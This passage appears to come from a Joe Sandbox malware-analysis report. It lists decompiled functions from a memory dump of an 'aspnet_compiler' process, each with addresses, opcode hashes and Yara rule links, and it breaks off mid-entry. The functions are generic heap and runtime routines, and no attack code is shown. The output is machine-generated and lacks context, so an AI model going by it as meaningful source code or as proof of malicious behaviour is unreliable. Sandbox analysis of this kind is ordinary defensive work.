				_t11 = L010F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0111FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E011192C6(_t11, _t14);
				}
				return _t11;
			}

0x01119295
0x01119299
0x0111929f
0x011192aa
0x011192ad
0x011192ae
0x011192af
0x011192b0
0x011192b4
0x011192bb
0x011192bb
0x011192c5

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 25ba6aad64f0f875d8d2255f382917f55daed123863e1256339434e9e94f5503
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 25E02B323405416BE7259E49DC80F43776DDFD2724F00407CB9045E242C7E5DD0987A0

Uniqueness

Uniqueness Score: -1.00%

Function 010F746D Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E010F746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E010EEB70(__ecx, 0x11c79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E011195D0();
							L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x010f746d
0x010f746d
0x010f746d
0x010f7471
0x010f7488
0x0113f92d
0x010f748e
0x010f7491
0x010f7495
0x0113f937
0x0113f93a
0x0113f94e
0x0113f953
0x0113f956
0x0113f956
0x010f7495
0x00000000
0x010f7488
0x010f7473
0x010f7478
0x010f747d
0x010f7481
0x00000000
0x010f7481
0x010f747d
0x010f747a
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32d10a945c1883a219527836894324d5186a62e5d761a8de78a420f02b9d4d13
Instruction ID: f0b17c855eb569c1ff20783d593a0e094a7f27328b052e18928108c11c474589
Opcode Fuzzy Hash: 32d10a945c1883a219527836894324d5186a62e5d761a8de78a420f02b9d4d13
Instruction Fuzzy Hash: 66F0B434900149AADF4A976CC842FBDBFA1AF14254F04025ED6D1A7955EB64A8028B97

Uniqueness

Uniqueness Score: -1.00%

Function 011A8CD6 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E011A8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x11cd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E010F7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0111B640(E01119AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x011a8ce5
0x011a8ced
0x011a8cf0
0x011a8cfb
0x011a8d0d
0x011a8cfd
0x011a8d06
0x011a8d06
0x011a8d18
0x011a8d19
0x011a8d1b
0x011a8d20
0x011a8d33

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eda3fc715b6cf216259a35ec12395beaeba46aec53c7e3b63e465810cc23f0bc
Instruction ID: 273d3800d61601209c6ce5458a3fc6fd98ed3881da1a5658c2b170b4ff68fdda
Opcode Fuzzy Hash: eda3fc715b6cf216259a35ec12395beaeba46aec53c7e3b63e465810cc23f0bc
Instruction Fuzzy Hash: CEF089719042099FDB08DBA8E545D6E7BB4EF18204F540169E515EB2C0DB34D900C755

Uniqueness

Uniqueness Score: -1.00%

Function 010D4F2E Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010D4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E011A88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E010FC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x10b1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x010d4f2e
0x010d4f34
0x010d4f38
0x01130b85
0x01130b85
0x01130b89
0x01130b9a
0x01130b9a
0x01130b9f
0x00000000
0x01130b9f
0x01130b94
0x01130b98
0x00000000
0x00000000
0x00000000
0x01130b98
0x010d4f3e
0x010d4f48
0x00000000
0x010d4f6e
0x00000000
0x010d4f70

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abdadc396efc8563e6ace489c1d1bad9dd5da579dab66a0e3a24f982f4996a9d
Instruction ID: 8ff654bc06367560203d5dc730bb6674fc09b922c1e82c3c6fafd738f3ee36e7
Opcode Fuzzy Hash: abdadc396efc8563e6ace489c1d1bad9dd5da579dab66a0e3a24f982f4996a9d
Instruction Fuzzy Hash: 9CF0E23A9256C48FE77ECB1CC284B22BBD4AF48778F444464E4458792EC734ED80C640

Uniqueness

Uniqueness Score: -1.00%

Function 011A8B58 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E011A8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x11cd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E010F7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0111B640(E01119AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x011a8b67
0x011a8b6f
0x011a8b72
0x011a8b7d
0x011a8b8f
0x011a8b7f
0x011a8b88
0x011a8b88
0x011a8b9a
0x011a8b9b
0x011a8b9d
0x011a8ba2
0x011a8bb5

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e0166af001c9976b4c2d3a70dc1d546544ca8e9d2b24d45d803e3f2c7b0ea0e
Instruction ID: f088aebf8e54964eb14a6dd1c9da112127b92281a7acec6d75b94093bb855622
Opcode Fuzzy Hash: 3e0166af001c9976b4c2d3a70dc1d546544ca8e9d2b24d45d803e3f2c7b0ea0e
Instruction Fuzzy Hash: 8BF082B1A14259AFDB18EBA8E906E6EB7B4FF14304F440469BA15DB3C0EB34D900C799

Uniqueness

Uniqueness Score: -1.00%

Function 0110A44B Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0110A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x11c7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L010F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0111FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x0110a44b
0x0110a453
0x0110a472
0x0110a476
0x00000000
0x0110a493
0x0110a47a
0x0110a47f
0x0110a486
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e90da050b1b18e1dd57964d4f8f457ec60dfdffa19aa2cbe865aced2ec84f258
Instruction ID: 36aa4d06c4eac8f88ff73c179d70a1aae605498ac4df9055db54e9a666c546c7
Opcode Fuzzy Hash: e90da050b1b18e1dd57964d4f8f457ec60dfdffa19aa2cbe865aced2ec84f258
Instruction Fuzzy Hash: 18E09272A41422ABD2265E18FC00F67B7ADDFE4651F0A4039EA04C7254D6A8DD02C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 010DF358 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E010DF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0110F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L010F4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x010df35d
0x010df361
0x010df367
0x010df372
0x010df38c
0x010df38c
0x010df394

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: a97d24665f8e2759be5824a026b67db95e4fcad52790c0aad85b565c981102b2
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 38E0D832A40219FBDB35A7D99D06F9BBFACDB58AA0F058195BA04D7190D9619E00C3D0

Uniqueness

Uniqueness Score: -1.00%

Function 010EFF60 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010EFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x10b11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E011A88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E010F0050(_t14);
				}
			}

0x010eff66
0x010eff6b
0x00000000
0x010eff8f
0x00000000
0x010eff8f

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9014bfcfb2643ac74d4f2baa8dc32f88a6a5133a063cf2074bbb54e724b7c8a0
Instruction ID: 12fa4d63b3d77c2f7eb938d7f4e173b76951260a15686d7b46543880e9255ddd
Opcode Fuzzy Hash: 9014bfcfb2643ac74d4f2baa8dc32f88a6a5133a063cf2074bbb54e724b7c8a0
Instruction Fuzzy Hash: 82E0DFB02052469FDB39DB9BE198F293BD89F96621F19849DF0884B502D661D880C68A

Uniqueness

Uniqueness Score: -1.00%

Function 011641E8 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E011641E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x11b08f0);
				_t5 = E0112D08C(__ebx, __edi, __esi);
				if( *0x11c87ec == 0) {
					E010EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x11c87ec == 0) {
						 *0x11c87f0 = 0x11c87ec;
						 *0x11c87ec = 0x11c87ec;
						 *0x11c87e8 = 0x11c87e4;
						 *0x11c87e4 = 0x11c87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01164248();
				}
				return E0112D0D1(_t5);
			}

0x011641e8
0x011641ea
0x011641ef
0x011641fb
0x01164206
0x0116420b
0x01164216
0x0116421d
0x01164222
0x0116422c
0x01164231
0x01164231
0x01164236
0x0116423d
0x0116423d
0x01164247

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc0411bc8f6ecc0a508957f225b61e6dc9da39b4514cf4446c5b9f46c9ebf84d
Instruction ID: 90521fcc02c5fb4e559c6b4b15aafc32c2d5b3c804e9e9b494bc7ddbe5de6b81
Opcode Fuzzy Hash: cc0411bc8f6ecc0a508957f225b61e6dc9da39b4514cf4446c5b9f46c9ebf84d
Instruction Fuzzy Hash: BAF01574911B01CECBB9EFA9E5847583AB8F754714F11812ED120876D8E73445B0CF05

Uniqueness

Uniqueness Score: -1.00%

Function 0118D380 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0118D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L010DE8B0(__ecx, _a4, 0xfff);
					L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0118d38a
0x0118d39b
0x0118d3b1
0x00000000
0x0118d3b6
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: b61d70695894f978b7c4e596b37160be0887f7af8dbc74b8d568500352aa12ba
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 8CE0C231284345BBDF266E84DC01FA97B16EB507A0F108031FE485AAD0C671AC91DAC4

Uniqueness

Uniqueness Score: -1.00%

Function 0110A185 Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0110A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x11c67e4 >= 0xa) {
					if(_t5 < 0x11c6800 || _t5 >= 0x11c6900) {
						return L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E010F0010(0x11c67e0, _t5);
				}
			}

0x0110a190
0x0110a1a6
0x0110a1c2
0x00000000
0x00000000
0x00000000
0x0110a192
0x0110a192
0x0110a19f
0x0110a19f

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1c72ebbd7a89acb35dae09085a11c8d76e877d7c229bc4fb08eaefa6a300627
Instruction ID: 8fb3e6e4c817ca224c490fcd2a526eac49efd1f03f03363b811b56455cb2ac4f
Opcode Fuzzy Hash: b1c72ebbd7a89acb35dae09085a11c8d76e877d7c229bc4fb08eaefa6a300627
Instruction Fuzzy Hash: E7D0C2715202001EC62E1300AE24BA22612FBA8B50F24880CF2020BAD4EBB088D0C108

Uniqueness

Uniqueness Score: -1.00%

Function 011016E0 Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E011016E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E01101710(0x11c67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L010F4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x011016e8
0x011016ef
0x011016f3
0x011016fe
0x00000000
0x01101700
0x0110170d
0x0110170d
0x011016f2
0x011016f2
0x011016f2
0x011016f2

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cb2437d539168f1944cf26ae1d31168280e6f8343b3198fa8d84cc9bf20f323
Instruction ID: d3cdf7e154c1dd19908a546ee73a4486f2c52018b960bad3e7c260d4a586dfd4
Opcode Fuzzy Hash: 3cb2437d539168f1944cf26ae1d31168280e6f8343b3198fa8d84cc9bf20f323
Instruction Fuzzy Hash: 55D0A931200601B6EE2E5B189C08B152652EBA0B85F38006CF30B999C0CFE8CDA2E048

Uniqueness

Uniqueness Score: -1.00%

Function 011553CA Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E011553CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E010EEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x011553ca
0x011553ce
0x011553d9
0x011553de
0x011553e1
0x011553e1
0x011553e6
0x011553f3
0x00000000
0x011553f8
0x011553fb

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 39dcd26edbce749ab8165ddfba17c0c1ce353293285d53a82c79d94240764f4d
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 71E08C31904784DFCF96DB49C650F8EBBF6FB84B00F140008A5585B621C724AC00CB40

Uniqueness

Uniqueness Score: -1.00%

Function 011035A1 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E011035A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E010EEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x011035a1
0x011035a1
0x011035a5
0x011035ab
0x011035ab
0x011035b5
0x00000000
0x011035c1
0x011035b7

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 720f03c839afac860666ef9a911da18803423bfbf7a8578eea9b45f307ef6d90
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: F3D0A931C215859EEB0FAB14C2287A83BB2BB00208F5820668052068F2C3BB4A0ACE01

Uniqueness

Uniqueness Score: -1.00%

Function 010EAAB0 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010EAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x010eaab6
0x010eaabb
0x0113a442
0x00000000
0x0113a448
0x0113a454
0x0113a454
0x010eaac1
0x010eaac1
0x010eaac6
0x010eaac6

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: f0a2ae3cdd2e395dd8d9049b4791ffb695875aa46886130487d55b846fa9b9b6
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 8AD0E935352A80CFD65BCB1DC558B1577E4BB44B44FC904D0E541CB766E72CD954CA00

Uniqueness

Uniqueness Score: -1.00%

Function 0115A537 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0115A537(intOrPtr _a4, intOrPtr _a8) {

				return L010F8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0115a553

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 23bb559b952b09b1f860984ff1bb80354d3f70ac25ef116b256f27819dc96290
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: F4C08C33080648BBCF126F81CC01F867F2AFBA4B60F008015FA480B970C632E970EB84

Uniqueness

Uniqueness Score: -1.00%

Function 010DDB40 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010DDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L010F4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x010ddb4d
0x010ddb54
0x010ddb5f
0x010ddb56
0x010ddb56
0x010ddb5c
0x010ddb5c

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: e149997e318e4de06056d15012a02473370e63318955d2b3a6910269bab35d13
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 39C08C30280B41EAEB221F20CD02B413AA0BB10B05F4400A06740DA4F0DBB8D901E700

Uniqueness

Uniqueness Score: -1.00%

Function 010DAD30 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

